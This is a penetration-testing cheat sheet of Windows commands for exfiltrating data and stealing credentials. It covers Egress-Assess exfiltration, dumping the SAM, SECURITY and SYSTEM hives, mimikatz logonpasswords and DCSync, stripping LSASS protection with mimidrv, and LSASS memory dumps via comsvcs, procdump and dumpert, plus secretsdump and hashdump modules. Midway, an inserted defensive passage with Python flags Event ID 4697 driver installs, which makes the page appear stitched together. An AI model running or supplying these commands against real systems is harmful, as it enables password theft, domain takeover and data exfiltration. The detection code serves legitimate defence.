Data Mining and Exfiltration
Exfiltration
HTTP(S) - DNS - FTP
./Egress-Assess.py --server http[s] --username <username> --password <password>
Invoke-EgressAssess -client http[s] -IP <server-IP/domain> -Username <username> -Password <password> -Datatype ssn
Find interesting files
PowerView
Find-InterestingFile -Path \\server\share [-Include keyword1,keyword2] [-OfficeDocs] [-LastAccessTime (Get-Date).AddDays(-7)]
NetNTLMv1 hash of the current user
Credentials
Without admin rights
Take a look at the techniques used for password mining in a privilege escalation scenario.
With admin rights
Windows Credential Management
Non-network logon (Interactive/NetworkCleartext/...): the client sends credentials to the service (creds are in lsass.exe).
SAM
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
lsadump::sam
load kiwi
lsa_dump_sam
use post/windows/gather/smart_hashdump
scanner/smb/impacket/secretsdump
impacket-secretsdump <admin>@<ip> -hashes <lm:nt>
Cache
lsadump::cache /system:system /sam:sam /security:security
run post/windows/gather/cachedump
LSASS
LSASS is protected - Mimidrv
If LSASS is protected (Full WinTcb), try to add or remove process protection using Mimidrv. It requires SeLoadDriverPrivilege.
It starts a service using advapi32!ServiceCreate, granting access to the service to the Everyone group.
Do not forget to clean up after yourself: !-
- Service Start Type: auto start (2)
Event ID 4697 contains information about the account that loaded the driver. Audit Security System Extension must be configured via Group Policy for this event to be generated.
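A detection sketch for the Event ID 4697 note above, as an added example that is not part of the original page: it parses Security event XML and flags service installs logged as a kernel driver, recording the installing account and whether the start type is auto start (2). The sample events, account names, service names, paths and the allowlist are constructed assumptions.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
KERNEL_DRIVER = 0x1   # ServiceType value logged for a kernel-mode driver
AUTO_START = 2        # ServiceStartType value named in the note above

def _event(event_id, **data):
    """Build a constructed Security event in the Windows event XML layout."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'</System><EventData>{fields}</EventData></Event>')

# Constructed sample data: accounts, service names and paths are made up.
SAMPLE_EVENTS = [
    _event(4697, SubjectDomainName="CORP", SubjectUserName="helpdesk1",
           ServiceName="mimidrv", ServiceFileName=r"C:\Users\Public\mimidrv.sys",
           ServiceType="0x1", ServiceStartType="2"),
    _event(4697, SubjectDomainName="CORP", SubjectUserName="svc-deploy",
           ServiceName="BackupAgent", ServiceFileName=r"C:\Program Files\Backup\agent.exe",
           ServiceType="0x10", ServiceStartType="2"),
    _event(4697, SubjectDomainName="CORP", SubjectUserName="svc-deploy",
           ServiceName="ExampleAvDrv", ServiceFileName=r"C:\Windows\System32\drivers\exav.sys",
           ServiceType="0x1", ServiceStartType="3"),
    _event(4624, TargetUserName="alice"),
]

def parse_service_install(xml_text):
    """Return the EventData fields of a 4697 event, or None for other events."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4697":
        return None
    return {d.get("Name"): d.text or "" for d in root.iterfind("e:EventData/e:Data", NS)}

def flag_driver_installs(events, allowlist=frozenset()):
    """Flag kernel-driver service installs whose service name is not allowlisted."""
    alerts = []
    for xml_text in events:
        f = parse_service_install(xml_text)
        if f is None or int(f.get("ServiceType") or "0", 0) != KERNEL_DRIVER:
            continue
        if f["ServiceName"].lower() in allowlist:
            continue
        alerts.append({
            "account": f'{f["SubjectDomainName"]}\\{f["SubjectUserName"]}',
            "service": f["ServiceName"],
            "image": f["ServiceFileName"],
            "auto_start": int(f.get("ServiceStartType") or "0", 0) == AUTO_START,
        })
    return alerts

if __name__ == "__main__":
    for alert in flag_driver_installs(SAMPLE_EVENTS, allowlist={"exampleavdrv"}):
        print(alert)
```

Matching on the service type and an allowlist of expected driver names, rather than on one driver name, keeps the rule useful when the driver or service is renamed.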
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
PPLdump64.exe -v lsass lass.dmp
!+
!processProtect /process:mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
!processprotect /process:lsass.exe
!-
LSASS is not protected
rundll32.exe comsvcs.dll, #24 "<PID> my.dmp full"
sqldumper.exe <PID> 0 0x0110
By default: C:\Windows\temp\dumpert.dmp.
dumpert.exe
rundll32.exe dumpert.dll,Dump
procdump.exe -accepteula -ma lsass.exe dump.dmp
sekurlsa::minidump dump.dmp (offline)
sekurlsa::logonPasswords full (offline)
-----
sekurlsa::logonPasswords full
-----
lsadump::lsa /inject
lsadump::lsa /patch (/id:<account_id>)
lsadump::lsa /patch (/name:<account_name>)
use post/windows/gather/smart_hashdump
-----
load kiwi
creds_all
wce32.exe [-w]
fgdump [-u <user> -p <password> -h <ip>]
DCSync
lsadump::dcsync /user:<domain\user> /domain:<fqdn_domain> [/dc:<dc_name>]